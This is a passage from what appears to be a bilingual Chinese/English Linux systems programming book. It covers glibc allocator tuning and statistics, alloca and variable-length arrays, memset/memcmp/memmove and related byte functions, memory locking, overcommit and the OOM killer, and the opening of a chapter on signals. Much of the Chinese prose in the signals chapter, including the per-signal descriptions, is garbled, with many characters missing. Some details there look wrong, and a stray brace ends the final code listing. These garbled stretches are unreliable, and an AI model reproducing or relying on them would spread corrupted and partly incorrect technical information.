ret = mallopt (M_MMAP_THRESHOLD, 64 * 1024);
if (!ret)
        fprintf (stderr, "mallopt failed!\n");
8.5.1 使用 malloc usable size() 和 malloc trim() 进行调优
Linux provides a couple of functions for peering inside glibc's memory allocator. The first lets a program query how much usable memory a given allocation actually holds:

#include <malloc.h>

size_t malloc_usable_size (void *ptr);

A successful call to malloc_usable_size() returns the actual usable size of the chunk of memory pointed at by ptr. Because glibc may round allocations up — to fit an existing chunk or an anonymous mapping — the usable space can exceed the requested size; it can never, of course, be smaller. An example:
size_t len = 21;
size_t size;
char *buf;
buf = malloc (len);
if (!buf) {
        perror ("malloc");
        return -1;
}

size = malloc_usable_size (buf);

/* we can actually use 'size' bytes of 'buf'... */
With the second function, a program can force glibc to return all immediately releasable memory to the kernel:
#include <malloc.h>
int malloc_trim (size_t padding);
A successful call to malloc_trim() shrinks the data segment as much as possible, minus padding bytes, which are kept in reserve, and returns 1. On failure, the call returns 0. Normally glibc performs this trimming automatically whenever the freeable memory reaches M_TRIM_THRESHOLD bytes. You will rarely call these two functions in production code; they exist mostly so that debugging and memory-profiling tools can inspect and steer glibc's memory allocation system.
8.6 调试内存分配
Programs can enable enhanced debugging in the memory subsystem via the MALLOC_CHECK_ environment variable. The additional checks come at the cost of less efficient allocation, but they are invaluable during the debugging stage of development. Because an environment variable controls the feature, no recompilation is needed:

$ MALLOC_CHECK_=1 ./rudder

If MALLOC_CHECK_ is set to 0, the memory subsystem silently ignores errors. If it is set to 1, an informative message is printed to stderr. If it is set to 2, the program is immediately terminated via abort(). Because MALLOC_CHECK_ changes the behavior of the running program, setuid programs ignore it.
8.6.1 获得统计数据
Linux provides mallinfo() for obtaining statistics about the memory allocation system:
#include <malloc.h>
struct mallinfo mallinfo (void);
A call to mallinfo() returns statistics in a mallinfo structure. The structure is returned by value, not via a pointer. Its fields are defined in <malloc.h>:

/* all sizes in bytes */
struct mallinfo {
        int arena;    /* size of data segment used by malloc */
        int ordblks;  /* number of free chunks */
        int smblks;   /* number of fast bins */
        int hblks;    /* number of anonymous mappings */
        int hblkhd;   /* size of anonymous mappings */
        int usmblks;  /* maximum total allocated size */
        int fsmblks;  /* size of available fast bins */
        int uordblks; /* size of total allocated space */
        int fordblks; /* size of available chunks */
        int keepcost; /* size of trimmable space */
};

Usage is simple:

struct mallinfo m;

m = mallinfo ( );
printf ("free chunks: %d\n", m.ordblks);
Linux also provides malloc_stats(), which prints memory-related statistics to stderr:
#include <malloc.h>
void malloc_stats (void);
Output from a memory-intensive program looks something like this:
Arena 0:
system bytes = 865939456
in use bytes = 851988200
Total (incl. mmap):
system bytes = 3216519168
in use bytes = 3202567912
max mmap regions = 65536
max mmap bytes = 2350579712
8.7 基于栈的分配
All of the mechanisms seen so far obtain dynamic memory from the heap or from anonymous memory mappings. We should expect this: the heap and mappings are, by their nature, the dynamic regions of the address space. The stack, however — home to a program's automatic variables (automatic variables) — is another option.

There is no reason a program cannot obtain dynamic memory from its stack, so long as the allocations are modest in size. To make a dynamic allocation from the stack, use alloca():

#include <alloca.h>

void * alloca (size_t size);

On success, a call to alloca() returns a pointer to size bytes of stack memory. The memory lives in the invoking function's stack frame and is freed automatically when that function returns (so you cannot use it after returning from main()!). On failure, some implementations return NULL, but most alloca() implementations cannot fail, or cannot report failure — failure shows up as stack overflow.
Usage mirrors malloc(), but there is no need (indeed, no way) to free the memory. The following function builds the pathname of a file (which might live under /etc) by concatenating a system configuration directory with the given filename, and then opens the file:
int open_sysconf (const char *file, int flags, int mode)
{
        const char *etc = SYSCONF_DIR; /* "/etc/" */
        char *name;

        name = alloca (strlen (etc) + strlen (file) + 1);
        strcpy (name, etc);
        strcat (name, file);

        return open (name, flags, mode);
}
When open_sysconf() returns, the memory obtained from alloca() is reclaimed automatically as the stack unwinds — the pointer must never be handed back to the caller for later use. Compare the equivalent function written with malloc():
int open_sysconf (const char *file, int flags, int mode)
{
        const char *etc = SYSCONF_DIR; /* "/etc/" */
        char *name;
        int fd;

        name = malloc (strlen (etc) + strlen (file) + 1);
        if (!name) {
                perror ("malloc");
                return -1;
        }

        strcpy (name, etc);
        strcat (name, file);
        fd = open (name, flags, mode);
        free (name);

        return fd;
}
Note that memory obtained with alloca() must not be used as a parameter within the same function-call expression, because the allocated bytes would then sit in the middle of the stack space reserved for the parameters. The following, therefore, is off-limits:
/* DO NOT DO THIS! */
ret = foo (x, alloca (10));
On systems with historically dubious alloca() implementations, behavior on failure — or with large allocations — can be undefined: a slightly-too-large alloca() can silently overflow the stack and crash the program, with no way to detect the error beforehand. These gremlins gave alloca() a bad reputation, so portable programs tend to avoid it.

On Linux, however, alloca() is a surprisingly underappreciated tool: it is implemented as a simple adjustment of the stack pointer (which is also why it cannot report errors), so it vastly outperforms malloc(). For small allocations in Linux-specific code, alloca() can yield excellent performance.
8.7.1 栈中的复制串
One common use of alloca() is to duplicate a string temporarily. For example:
/* we want to duplicate ’song’ */
char *dup;
dup = alloca (strlen (song) + 1);
strcpy (dup, song);
/* manipulate ’dup’... */
return; /* ’dup’ is automatically freed */
Because this need is common, Linux provides strdupa() and strndupa(), which duplicate a given string on the caller's stack:
#define _GNU_SOURCE
#include <string.h>
char * strdupa (const char *s);
char * strndupa (const char *s, size_t n);
A call to strdupa() returns a duplicate of s. A call to strndupa() duplicates at most n characters of s; if s is longer than n, the copy is truncated to n characters and a null terminator is appended. These functions share alloca()'s benefits: the duplicate is freed automatically when the invoking function returns. POSIX defines none of alloca(), strdupa(), or strndupa(), and their standing on other operating systems is spotty; portable code should avoid all of them. On Linux, though, they perform very well, since the "allocation" amounts to nothing more than moving the stack pointer.
8.7.2 变长数组
C99 introduced variable-length arrays (VLAs): arrays whose size is fixed at runtime rather than at compile time. GNU C had supported VLAs for some time, but now that C99 has standardized them, their use is considerably more justified. VLAs sidestep the costs of dynamic allocation in much the same way as alloca(). Usage is exactly what you would expect:
for (i = 0; i < n; ++i) {
char foo[i + 1];
/* use ’foo’... */
}
In this snippet, foo is an array of i+1 chars, recreated on each loop iteration and automatically destroyed when it falls out of scope. Had we used alloca() instead, the stack space would not be reclaimed until the enclosing function returned — after n iterations, an unreclaimed n*(n+1)/2 bytes would have piled up. Using a VLA, we can rewrite our open_sysconf() once more:
int open_sysconf (const char *file, int flags, int mode)
{
        const char *etc = SYSCONF_DIR; /* "/etc/" */
        char name[strlen (etc) + strlen (file) + 1];

        strcpy (name, etc);
        strcat (name, file);

        return open (name, flags, mode);
}
The essential difference from the alloca() version is that the VLA's memory is released when name goes out of scope — here, when the function returns, so no earlier — whereas alloca()'d memory always persists until the function returns. Freeing at end of scope (the end of a for loop body, say) reclaims space earlier at no cost and avoids accumulating unreclaimed stack as a loop spins. If, for some reason, the memory should outlive the scope, alloca() remains the sensible choice.

Mixing alloca() and variable-length arrays within one function invites confusion; pick whichever is appropriate and stick with it.
8.8 选择一个合适的内存分配机制
The range of allocation options explored in this chapter may leave you wondering which to use. For most purposes, malloc() is the right answer. Some circumstances, however, favor a different approach. Table 8-2 summarizes guidelines for choosing.
Approach                  Advantages                                Disadvantages

malloc()                  Easy, simple, common                      Returned memory is not zeroed

calloc()                  Zeroes the memory; simple                 Convoluted for non-array
                          for arrays                                allocations

realloc()                 Resizes an existing allocation            Useful only for resizing

brk() / sbrk()            Fine-grained control over the heap        Far too low-level for most
                                                                    programs

anonymous memory          Easy to work with; sharable;              Suboptimal for small
mappings                  resizable; permissions and                allocations; malloc() uses
                          advice adjustable; good for               them automatically when
                          large allocations                         that is optimal

posix_memalign()          Memory aligned to any                     Relatively new, so
                          reasonable boundary                       portability is a concern;
                                                                    overkill unless alignment
                                                                    is required

memalign() / valloc()     More common than                          Not POSIX; weaker alignment
                          posix_memalign() on older                 control than
                          Unix systems                              posix_memalign()

alloca()                  Fastest way to allocate;                  Cannot report errors; bad
                          no need to free                           for large allocations;
                                                                    broken on some Unix systems

variable-length arrays    Same as alloca(), but frees               Useful only for arrays;
                          the memory when the array                 alloca()'s freeing behavior
                          goes out of scope                         is sometimes preferable;
                                                                    less common than alloca()
                                                                    on other Unix systems
Finally, do not forget the alternatives to dynamic allocation altogether: automatic and static variables. Whenever feasible, a fixed-size automatic allocation on the stack yields simpler code and often better performance.
8.9 存储器操作
C also provides a family of functions for operating on raw bytes. They behave much like their string counterparts (strcmp(), strcpy(), and friends), but they rely on a caller-supplied size rather than NUL termination. Note that none of them can report errors — prevention is the only defense, since a bad pointer earns a segmentation fault.
8.9.1 字节设置
The most commonly used of these byte operations is memset():
#include <string.h>
void * memset (void *s, int c, size_t n);
A call to memset() sets the n bytes starting at s to the byte c, and returns s. A frequent use is zeroing a block of memory:

/* zero out [s,s+256) */
memset (s, '\0', 256);
bzero() is an older, deprecated BSD interface for the same task. New code should use memset(), but Linux provides bzero() for backward compatibility:

#include <strings.h>

void bzero (void *s, size_t n);

The following call is equivalent to the memset() example above:

bzero (s, 256);

Note that bzero() (like the other b interfaces) lives in the header <strings.h>, not <string.h>.
Do not use memset() to zero memory that you are about to allocate when calloc() will do. Not only is calloc() one call instead of two (malloc() followed by memset()); it can also be faster, because the kernel may be able to hand the process pages that are already zeroed. Zeroing only a portion of an existing buffer is a different story — there, memset() is the tool.
8.9.2 字节比较
In the same vein as strcmp(), memcmp() compares two chunks of memory for equivalence:
#include <string.h>
int memcmp (const void *s1, const void *s2,
size_t n);
A call to memcmp() compares the first n bytes of s1 and s2 and returns 0 if the blocks of memory are identical, a value less than 0 if s1 is less than s2, and a value greater than 0 otherwise.
BSD again provides a now-deprecated interface of similar function:
int bcmp (const void *s1, const void *s2, size_t
n);
A call to bcmp() compares the first n bytes of s1 and s2, returning 0 if the blocks are identical and a nonzero value otherwise. Because of structure padding (alignment), comparing two structures with memcmp() or bcmp() is unreliable: the padding bytes hold undefined contents that may differ even between two otherwise-identical structure instances. Thus, the following is broken:
/* are two dinghies identical? (BROKEN) */
int compare_dinghies (struct dinghy *a, struct
dinghy *b)
{
return memcmp (a, b, sizeof (struct dinghy));
}
Programmers who want to compare structures can do so safely only member by member. That approach permits some optimization, but it works — unlike memcmp() — wherever padding is involved:
/* are two dinghies identical? */
int compare_dinghies (struct dinghy *a, struct
dinghy *b)
{
int ret;
if (a->nr_oars < b->nr_oars)
return -1;
if (a->nr_oars > b->nr_oars)
return 1;
ret = strcmp (a->boat_name, b->boat_name);
if (ret)
return ret;
/* and so on, for each member... */
}
8.9.3 字节移动
memmove() copies the first n bytes of src to dst, returning dst:
#include <string.h>
void * memmove (void *dst, const void *src,
size_t n);
Again, BSD provides a deprecated interface of identical function:
#include <strings.h>
void bcopy (const void *src, void *dst, size_t n);
Although both take src and dst, note that bcopy() takes them in the reverse order. Both bcopy() and memmove() safely handle overlapping memory regions (say, dst lying within src), which allows, for example, shifting bytes up or down within a buffer. Such cases are rare, however, and a programmer who knows the regions do not overlap can say so by using memcpy() instead, which the compiler and C library may implement more aggressively:
#include <string.h>
void * memcpy (void *dst, const void *src, size_t
n);
If dst and src overlap, memcpy()'s behavior is undefined. Another copying alternative stops at a given byte — memccpy():
#include <string.h>
void * memccpy (void *dst, const void *src, int
c, size_t n);
memccpy() behaves like memcpy(), except that it also stops copying when it finds the byte c within the first n bytes of src. The call returns a pointer to the byte in dst just after where c was written, or NULL if c was not found.
Finally, mempcpy() copies memory and steps the pointer for you:
#define _GNU_SOURCE
#include <string.h>
void * mempcpy (void *dst, const void *src,
size_t n);
mempcpy() behaves exactly like memcpy(), except that it returns a pointer to the byte following the last byte copied — convenient when copying consecutive chunks of data into one buffer. The improvement is minor, since the return value is simply dst + n. It is a GNU extension.
8.9.4 字节搜索
memchr() and memrchr() locate a given byte within a block of memory:
#include <string.h>
void * memchr (const void *s, int c, size_t n);
memchr() scans the n bytes of memory starting at s for the character c, which is interpreted as an unsigned char:
#define _GNU_SOURCE
#include <string.h>
void * memrchr (const void *s, int c, size_t n);
The call returns a pointer to the first byte matching c, or NULL if none is found. memrchr() performs the same search backward, starting from the end of the n bytes of memory at s. Unlike memchr(), memrchr() is a GNU extension and not part of the C language. For more complicated searches, the awfully named memmem() locates an arbitrary block of bytes within another:
#define _GNU_SOURCE
#include <string.h>
void * memmem (const void *haystack,
size_t haystacklen,
const void *needle,
size_t needlelen);
memmem() searches the block haystack, of length haystacklen, for the first occurrence of the block needle, of length needlelen, returning a pointer to it, or NULL if needle is nowhere within haystack. It, too, is a GNU extension.
8.9.5 字节加密
Linux's C library also provides an interface for trivially obfuscating bytes of data:
#define _GNU_SOURCE
#include <string.h>
void * memfrob (void *s, size_t n);
A call to memfrob() XORs each of the first n bytes starting at s with the number 42, returning s. The transformation is its own inverse, so a second memfrob() over the same region restores it; the following is therefore a (rather expensive) no-op on secret:

memfrob (memfrob (secret, len), len);

This is in no way a substitute for real encryption (it is worse than even a simple Caesar cipher); it merely renders the bytes unreadable at a glance. It is a GNU extension.
8.10 内存锁定
Linux implements demand paging: pages are faulted in from disk as needed, and written out to swap as needed. This lets the virtual address spaces of all processes, taken together, exceed the physical memory in the machine, while each process sees one contiguous address space.

Paging is transparent, and programs generally need not care. Sometimes, though, a program wants to influence it:

Determinism (Determinism)
        Time-constrained applications need predictability. If a memory access can page-fault — incurring expensive disk I/O — an operation may overrun its deadline. By ensuring the pages it needs are always physically resident and can never be paged out, a process guarantees that memory accesses will not fault, providing consistency, determinism, and improved worst-case performance.

Security (Security)
        If secrets, such as private keys, are kept in pageable memory, they may end up stored unencrypted in the swap area on disk. If the swap is readable by an attacker, or the disk is physically stolen, the secret is exposed — possibly long after the program exits. Locking such pages into physical memory keeps them off the disk. (Some high-security deployments use encrypted swap instead.)

Of course, locking memory can degrade overall system behavior. The kernel balances the whole system on the assumption that it may evict any page; locked pages shrink its options, potentially forcing it to evict pages belonging to other processes — or other pages of your own — that it would rather have kept. If the kernel's eviction decisions are any good, the pages it is now forced to evict are exactly the ones it preferred not to.
8.10.1 锁定部分地址空间
POSIX 1003.1b-1993 defines two interfaces for "locking" one or more pages into physical memory, ensuring they are never paged out to disk. The first locks a given address interval:
#include <sys/mman.h>
int mlock (const void *addr, size_t len);
A call to mlock() locks the virtual memory in [addr, addr+len) into physical memory, returning 0 on success. On failure, it returns -1 and sets errno appropriately.

A successful call locks every physical page containing any part of [addr, addr+len). POSIX requires addr to be page-aligned. Linux rounds addr down to the nearest page boundary when needed; portable programs, however, should align addr themselves.

Possible errno values include:

EINVAL  len is negative.

ENOMEM  The call would cause the number of locked pages to exceed the RLIMIT_MEMLOCK limit (see the later section on locking limits).

EPERM   RLIMIT_MEMLOCK is 0, and the process lacks the CAP_IPC_LOCK capability (again, see the limits section).

A child created via fork() does not inherit its parent's memory locks. Because Linux address spaces are copy-on-write, however, the child's pages effectively stay in memory until the child writes to them.
int ret;
/* lock ’secret’ in memory */
ret = mlock (secret, strlen (secret));
if (ret)
perror (”mlock”);
8.10.2 锁定全部地址空间
If a process wants to lock its entire address space into physical memory, piecemeal mlock() calls are clumsy. For real-time applications, POSIX defines mlockall():
#include <sys/mman.h>
int mlockall (int flags);
A call to mlockall() locks all of the pages in the invoking process's address space into physical memory. flags, a bitwise OR of the following two values, controls the behavior:

MCL_CURRENT  If set, mlockall() locks all currently mapped pages — the stack, data segment, mapped files, and so on — into the process's address space.

MCL_FUTURE   If set, mlockall() ensures that pages mapped in the future are locked as well.

Programs may specify either or both flags. On success, the call returns 0; on failure, it returns -1 and sets errno to one of:

EINVAL  flags is negative or otherwise invalid.

ENOMEM  The call would raise the number of locked pages above the RLIMIT_MEMLOCK limit (see the limits section).

EPERM   RLIMIT_MEMLOCK is 0, and the process lacks the CAP_IPC_LOCK capability (ditto).
8.10.3 内存解锁
POSIX also standardizes two interfaces for unlocking pages, allowing the kernel to page them out again as needed:
#include <sys/mman.h>
int munlock (const void *addr, size_t len);
int munlockall (void);
A call to munlock() unlocks the pages containing any part of [addr, addr+len), undoing the effects of mlock(). munlockall() undoes the effects of mlockall(). Both return 0 on success; on failure, they return -1, with errno set to one of:

EINVAL  len is negative (munlock() only).

ENOMEM  Some of the specified pages are not valid.

EPERM   RLIMIT_MEMLOCK is 0, and the process lacks the CAP_IPC_LOCK capability.
Memory locks do not nest: a page locked once or many times via mlock() or mlockall() is fully unlocked by a single munlock() or munlockall().
8.10.4 锁定的限制
Because locked pages cannot be swapped out, locking memory affects the whole system — if one process locks too much, others suffer. Linux therefore limits how many pages a process may lock. A process holding the CAP_IPC_LOCK capability may lock any number of pages; a process without it may lock only RLIMIT_MEMLOCK bytes, which defaults to 32 KB — enough to tuck away a secret or two without hurting the system. (Chapter 6 discusses resource limits and how to change them.)
8.10.5 这个页面在物理内存中吗?
Sheer curiosity aside, a process may want to know which of its pages are resident in physical memory. Linux provides mincore() to determine, for a given range at the time of the call, which pages are physically resident:
#include <unistd.h>
#include <sys/mman.h>
int mincore (void *start,
size_t length,
unsigned char *vec);
A call to mincore() provides a vector describing which pages of a mapping were resident in physical memory at the moment of the call. The vec array reports on the pages in [start, start+length) — start must be page-aligned; length need not be. Each byte of vec corresponds, in order, to one page in the range, beginning with the page at start; vec must therefore be at least (length - 1 + page size) / page size bytes long. The lowest bit of each byte is 1 if the corresponding page is resident and 0 if it is not; the remaining bits are currently undefined and reserved for future use.
On success, the call returns 0. On failure, it returns -1, and errno is set to one of:

EAGAIN  Insufficient kernel resources are available to proceed.

EFAULT  vec points at an invalid address.

EINVAL  start is not page-aligned.

ENOMEM  [start, start+length) contains memory that is not part of a file-based mapping.
Currently, this call works properly only for file-backed mappings created with MAP_SHARED — a significant limitation at the time of this writing.
8.11 投机性存储分配策略
Linux employs an optimistic allocation strategy. When a process requests additional memory from the kernel — by enlarging its data segment, or by creating a new memory mapping — the kernel commits to the memory without actually providing any physical storage. Only when the process writes to the new memory does the kernel satisfy the commitment by allocating physical pages. The kernel does this lazily, page by page, performing demand paging and copy-on-write as needed.

This has several advantages. First, the allocation is deferred to the last possible moment. Second, requests are satisfied lazily, page by page, so only physical memory actually used is ever allocated. Finally, the committed memory can vastly exceed the available physical memory, and even exceed physical memory plus swap. This last feature is called overcommitment (overcommitment).
8.11.1 超量使用和内存耗尽
Overcommitting lets processes map more memory than the machine physically has, just as demand paging lets processes run with more virtual memory than physical memory. It allows a copy-on-write fork() of a 2 GB process without 2 GB of headroom, and a writable private mapping of a 2 GB file while committing storage only for the pages actually written. Refusing such commitments would require physical backing for pages that are, in the common case, never dirtied, shrinking the system's effective capacity.

But what if processes actually try to cash in every last commitment after the kernel has promised more than it can deliver? Then the system runs out of memory — an OOM (out of memory) condition. To handle OOM, the kernel deploys the OOM killer, which selects a victim process — attempting to choose one that is expendable and consuming a great deal of memory — and terminates it.

OOM conditions are rare, precisely because overcommitment works so well in practice; still, an OOM, with some unlucky process summarily killed, is seldom welcome.

For systems where that is unacceptable, the kernel allows overcommitment to be disabled via the file /proc/sys/vm/overcommit_memory, or the equivalent sysctl parameter vm.overcommit_memory.

The default value, 0, enables the default heuristic overcommitment strategy: the kernel overcommits within reason, but rejects wildly excessive commitments. A value of 1 permits all commitments with no checks — attractive for memory-intensive workloads, such as some scientific applications, that allocate far more memory than they ever touch.

A value of 2 disables overcommitment and enables strict accounting (strict accounting). In this mode, commitments are limited to the size of the swap area plus a configurable percentage of physical memory, set via /proc/sys/vm/overcommit_ratio (or the vm.overcommit_ratio sysctl), 50 percent by default. Only part of physical memory is counted because the kernel itself consumes memory, including pages that can never be swapped out.

Strict accounting guarantees that a granted commitment can always be satisfied, so the OOM killer is never needed. But it also rejects allocations that heuristic mode would allow, since it assumes every copy-on-write page may someday be dirtied — which rarely happens. Whether the safety of strict accounting outweighs its pessimism depends on the system: committing more than can possibly be fulfilled is acceptable only so long as nobody ever calls in the debt.
第 9 章
信号
提处理异步件的件。件以自
( Ctrl-C或自程或内内的
进程以零的。作进程间(IPC的式进
程以给进程。
件的异步的(以程的何
时 Ctrl-C程对的处理异步的。处理内
时内程的异步调处理。
Unix 的。时间的的进。
性方的能出的能方
以的。同的 Unix 对同的
。的 POSIX 的处理。
Linux 提的我们将的。
我们们的。我
们 Linux 理操作的。
出的程。即设进
的程(的然
处理程。
9.1 信号概念
的周。(我们时
出或。然内存以。空内
的处理。内进程的以以程
何操作。能 SIGKILL
SIGSTOP。的原理能或进
程进程能 SIGKILL(进程能或
SIGSTOP(进程能将。
处理 内进程的的
。进程。进程
的方。
SIGINT SIGTERM 的的。进程
SIGINT 处理的能
提示。进程 SIGTERM 以
的理工作或时文件。 SIGKILL
SIGSTOP 能。
操作
操作作的。操作进程。
对 SIGKILL 。然程
的的提的的
的程对们。我们
们的操作。
处理的
对。内能给的程提的
上文能的更的 IPC 。
9.1.1 信号标识符
以 SIG 的。 SIGINT Ctrl-
C 时出的 SIGABRT 进程调 abort() 时的 SIGKILL
进程时的。
<signal.h> 文件的。处理程单的
相。
的映射实的同的 Unix 同的
的以同的方式映射的( SIGKILL 9。
的程的读的的。
的 1 ( SIGHUP性。 31
的程们的。何的 0
的空。空实的
调( kill()的 0 。
以 kill-l 的的。
9.1.2 Linux 支持的信号
Table 9-1 lists the signals that Linux supports.

Table 9-1. Signals
Signal      Description                                        Default action

SIGABRT     Sent by abort()                                    Terminate with core dump
SIGALRM     Sent by alarm()                                    Terminate
SIGBUS      Hardware or alignment error                        Terminate with core dump
SIGCHLD     Child has terminated or stopped                    Ignored
SIGCONT     Continue a stopped process                         Ignored (continues the process)
SIGFPE      Arithmetic exception                               Terminate with core dump
SIGHUP      Process's controlling terminal was closed          Terminate
            (most commonly, the user logged out)
SIGILL      Process tried to execute an illegal instruction    Terminate with core dump
SIGINT      Interrupt character typed (Ctrl-C)                 Terminate
SIGIO       Asynchronous I/O event                             Terminate (a)
SIGKILL     Uncatchable process termination                    Terminate
SIGPIPE     Process wrote to a pipe with no reader             Terminate
SIGPROF     Profiling timer expired                            Terminate
SIGPWR      Power failure                                      Terminate
SIGQUIT     Quit character typed (Ctrl-\)                      Terminate with core dump
SIGSEGV     Invalid memory access                              Terminate with core dump
SIGSTKFLT   Coprocessor stack fault                            Terminate (b)
SIGSTOP     Suspends execution; cannot be caught               Stop
SIGSYS      Process tried an invalid system call               Terminate with core dump
SIGTERM     Catchable process termination                      Terminate
SIGTRAP     Trace or breakpoint trap                           Terminate with core dump
SIGTSTP     Suspend character typed (Ctrl-Z)                   Stop
SIGTTIN     Background process read from its terminal          Stop
SIGTTOU     Background process wrote to its terminal           Stop
SIGURG      Urgent out-of-band I/O is pending                  Ignored
SIGUSR1     Process-defined signal                             Terminate
SIGUSR2     Process-defined signal                             Terminate
SIGVTALRM   setitimer() timer created with ITIMER_VIRTUAL      Terminate
            expired
SIGWINCH    Terminal window size changed                       Ignored
SIGXCPU     Process exceeded its processor resource limit      Terminate with core dump
SIGXFSZ     Process exceeded its file size resource limit      Terminate with core dump
(a) Behavior may differ on other Unix systems, such as BSD.
(b) The Linux kernel no longer generates this signal.
Several other signal values exist, but Linux defines them as aliases for existing ones: SIGINFO is defined as SIGPWR*, SIGIOT as SIGABRT, and SIGPOLL and SIGLOST as SIGIO.
我们我们的
SIGABRT
abort() 将给调的进程。然进程
内存文件。 Linux assert()
件的时调 abort()。
SIGALRM
alarm() setitimer()(以 ITIMER REAL 调
超时时调们的进程。
将以及相的。
SIGBUS
进程内存的件时
内存 SIGSEGV。的 Unix
的对的
内存。然 Linux 内能自
。进程以的方式
mmap()(对内存映射的的内存
时内。内将进程进内存
。
SIGCHLD
进程或时内给进程的进程
。的 SIGCHLD 的进程对
们的子进程存进程示
处理。的处理程调 wait()(
的内子进程的 pid 出。
SIGCONT
进 程 时内 给 进 程
。的进程
操作以。
或新。
SIGFPE
的的异
相的异。异出
∗ Alpha 的。的存。
以 0。的操作进程内存文件进
程以处理。进程
进程的及操作的的。
SIGHUP
的时内给进程
。进程时内给进程的
进程。操作进程
出。进程
示进程们的文件。给 Apache
SIGHUP 以新读 http.conf 文
件。的 SIGHUP 的
性的。的进程
。
SIGILL
进程时内
。操作进程进内存。进程以
处理 SIGILL的
的。
SIGINT
( Ctrl-C时给
进程的进程。的操作进程进
程以处理进
理工作。
SIGIO
BSD 的 I/O 件时出。(
对 I/O 的对 Linux
的。
SIGKILL
kill() 调出的存给
理提的方件进程。
能或的进程。
SIGPIPE
进 程 写 读 的 进 程
内。的操作进程
以处理。
SIGPROF
时 超 时 ITIMER VIRTUAL 调
setitimer() 。操作进程。
SIGPWR
相的。 Linux
件(的(UPS。
UPS 进程然作出
进理。
SIGQUIT
出(Ctrl-\时内给
进程的进程。的操作
进程进内存。
SIGSEGV
的段进程进内存
时内出。映射
的内存读的内存读的内存
或写的内存写。进程以
处理的操作进程进内存
。
SIGSTOP
kill() 出。件进程
能或。
SIGSYS
进程调效的调时内进
程。进文件新
的操作上的(新的调
的操作上能
。 glibc 进调的进文件
。相效的调
-1将 errno 设 ENOSYS。
SIGTERM
kill() 的进
程(操作。进程以进程
进理及时的进
程的。
SIGTRAP
进程时内给进程。
调进程。
SIGTSTP
( Ctrl-Z时内给
进程的进程。
SIGTTIN
进程的读时
给进程。的操作进程。
SIGTTOU
进程的写时
给进程。的操作进程。
SIGURG
(OOB时内给进程
。超出的。
SIGUSR1 SIGUSR2 给 自 的内
们。进程以以何的 SIGUSR1 SIGUSR2。
的示进程进同的操作。的操作
进程。
SIGVTALRM
以 ITIMER VIRTUAL 的时超时时
setitimer() 。时。
SIGWINCH
小时内给进程的进程
。的进程
们的小们以处理
。的程的子 top—
时的小何的。
SIGXCPU
进程超处理时内给进程
。内的进程
出或超处理。超内
给进程 SIGKILL 。
SIGXFSZ
进程超的文件小时内给进程
。的操作进程或
文件超的调将 -1
将 errno 设 EFBIG。
9.2 基本信号管理
The simplest and oldest interface for signal management is signal(). Defined by the ISO C89 standard — which standardizes only the lowest common denominator of signal support — the call is supported in some form by every Unix system. Linux offers substantially more control through other interfaces, covered later in this chapter; because signal() is the most basic, and despite its age still widely used, we examine it first:
#include <signal.h>
typedef void (*sighandler_t)(int);
sighandler_t signal (int signo, sighandler_t
handler);
A successful call to signal() registers handler as the new signal handler for the signal signo, replacing whatever behavior was previously associated with it. signo is one of the signal names discussed earlier, such as SIGINT or SIGUSR1 — recall that a process cannot catch SIGKILL or SIGSTOP, so installing handlers for those two is meaningless.

A signal handler returns void — sensible, since a handler has no standard place to return a value — and takes one integer argument: the identifier of the signal being handled. This lets a single function handle multiple signals. A handler has the prototype:

void my_handler (int signo);

Linux uses a typedef, sighandler_t, for this prototype. Other Unix systems use their own types, or function pointers directly; portable programs should not depend on the name sighandler_t.

When the kernel raises a registered signal for a process, it stops the program's normal instruction flow and invokes the handler, passing the original signo given to signal().

Instead of a function, handler may be one of two special values telling the kernel to reset or ignore the signal:

SIG_DFL  Reset the signal given by signo to its default behavior. For SIGPIPE, for example, the process will terminate.

SIG_IGN  Ignore the signal given by signo.

signal() returns the signal's previous behavior — a pointer to the previous handler, or SIG_DFL or SIG_IGN. On error, it returns SIG_ERR; it does not set errno.
9.2.1 等待信号
pause(), defined by POSIX, is handy for writing signal-driven programs that sleep until a signal arrives: it blocks the process until it receives a signal that either is handled or terminates the process:
#include <unistd.h>
int pause (void);
pause() returns only when a signal is received and handled; the handler runs first, and pause() then returns -1 with errno set to EINTR. If the kernel raises an ignored signal, the process does not wake up.

In the Linux kernel, pause() is one of the simplest system calls, just two lines of C: it sets the process state to interruptible sleep and then calls schedule(), invoking the Linux process scheduler. Until an event the process cares about occurs — in practice, only a signal — the process consumes no processor time at all.*
9.2.2 例子
我们单的子。子 SIGINT 单的
处理程然程( SIGINT
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <signal.h>
/* handler for SIGINT */
static void sigint_handler (int signo)
{
        /*
         * Technically, you shouldn't use printf() inside a
         * signal handler, but it isn't the end of the world.
         * We'll discuss why in the section on reentrancy.
         */
        printf ("Caught SIGINT!\n");
        exit (EXIT_SUCCESS);
}
int main (void)
∗ pause() is among the simplest system calls, rivaled only by calls such as getpid() and gettid(), which take no parameters at all.
{
/*
* sigint_handler 作 SIGINT 的处理程
。
*/
if (signal (SIGINT, sigint_handler) ==
SIG_ERR) {
fprintf (stderr, ”Cannot handle
SIGINT!\n”);
exit (EXIT_FAILURE);
}
for (;;)
pause ( );
return 0;
}
For a second example, the following registers a single handler for both SIGTERM and SIGINT, restores SIGPROF to its default action (which terminates the process), and ignores SIGHUP (which would otherwise terminate the process):
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <signal.h>
/* handler for SIGINT and SIGTERM */
static void signal_handler (int signo)
{
        if (signo == SIGINT)
                printf ("Caught SIGINT!\n");
        else if (signo == SIGTERM)
                printf ("Caught SIGTERM!\n");
        else {
                /* this should never happen */
                fprintf (stderr, "Unexpected signal!\n");
                exit (EXIT_FAILURE);
        }

        exit (EXIT_SUCCESS);
}
int main (void)
{
        /*
         * Register signal_handler as the signal handler
         * for SIGINT.
         */
        if (signal (SIGINT, signal_handler) == SIG_ERR) {
                fprintf (stderr, "Cannot handle SIGINT!\n");
                exit (EXIT_FAILURE);
        }

        /*
         * Register signal_handler as the signal handler
         * for SIGTERM.
         */
        if (signal (SIGTERM, signal_handler) == SIG_ERR) {
                fprintf (stderr, "Cannot handle SIGTERM!\n");
                exit (EXIT_FAILURE);
        }

        /* reset SIGPROF's behavior to the default */
        if (signal (SIGPROF, SIG_DFL) == SIG_ERR) {
                fprintf (stderr, "Cannot reset SIGPROF!\n");
                exit (EXIT_FAILURE);
        }

        /* ignore SIGHUP */
        if (signal (SIGHUP, SIG_IGN) == SIG_ERR) {
                fprintf (stderr, "Cannot ignore SIGHUP!\n");
                exit (EXIT_FAILURE);
        }

        for (;;)
                pause ( );

        return 0;
}
}
9.2.3 执行与继承
